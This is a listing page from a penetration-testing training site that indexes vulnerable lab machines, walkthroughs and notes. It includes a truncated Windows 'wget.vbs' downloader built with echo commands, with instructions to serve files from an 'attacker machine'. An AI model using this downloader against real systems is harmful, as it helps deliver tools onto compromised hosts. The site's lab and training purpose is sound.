Latest vulnerable machines- MrLeet


MrLeet provides vulnerables machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
Machine: Matrix_3
By: unknowndevice64 2019-07-09 12:50:59

MrLeet

Machine Details: Matrix is a medium level boot2root challenge Series of MATRIX Machines. The OVA has been tested on both VMware and Virtual Box.

Flags: Your Goal is to get root and read /root/flag.txt

Networking...

Machine Size: 554
Machine OS: linux
Machine Level: intermediate


Score: 0

Machine: DC-6
By: dcau 2019-05-18 11:12:55

MrLeet

Machine Details: DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginn...

Machine Size: 618
Machine OS: linux
Machine Level: intermediate


Score: 0

Machine: DC-5
By: dcau 2019-05-18 11:12:59

MrLeet

Machine Details: DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for...

Machine Size: 521
Machine OS: linux
Machine Level: intermediate


Score: 0

Latest walkthrough of machines- MrLeet


MrLeet provides walkthrough of vulnerable machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
Walkthrough of: Matrix_1
By: unknowndevice64 2019-05-17 12:40:46

MrLeet

Discovery
First, we need to recognize the IP that the machine is using, I use arp-scan for the job but you can use netdiscover or nmap to do the trick, with arp-scan is like this:

arp-scan -l
This puts out a list of all the machines in the network that a re sending ARP packets, the output looks like this:

The IP of the machine identified
With that, we can proceed to do some footprinting u...


Score: 0

Latest notes for PenTesting- MrLeet


MrLeet provides useful notes from different hackers allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-27 11:50:14

Recently (at the end of 2017), OWASP updated its Top 10 list. For the unfamiliar, let me briefly explain what that means: the industry standard of basic-web-security education has altered. Though it’s never been a complete security education, the OWASP Top Ten is where almost all standards for web-developer security education begin. So when it ch...


Score: 0


echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTI...


Score: 0


Usage: cscript wget.vbs http://[URL (including file)] [filename to save to]

On attacker machine:
copy file to transfer to: **/var/www**
start apache: **service apache2 start**



echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT...


Score: 0

Latest picturess useful in PenTesting- MrLeet


MrLeet provides useful pictures from different hackers useful in digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-27 11:50:19


owasp top 10 2013 vs 2017 explained_2


Score: 0

By: ajayverma 2019-06-27 11:50:24


owasp top 10 2013 vs 2017 explained_1


Score: 0

By: ajayverma 2019-06-25 12:38:28


JQuery Cheat Sheet


Score: 0

By: ajayverma 2019-06-25 12:38:32


Redux Cheat Sheet


Score: 0

By: ajayverma 2019-06-25 12:10:32


Cheatsheet_WindowsCommandLine part_2


Score: 0

By: ajayverma 2019-06-25 12:10:36


Cheatsheet_WindowsCommandLine part_1


Score: 0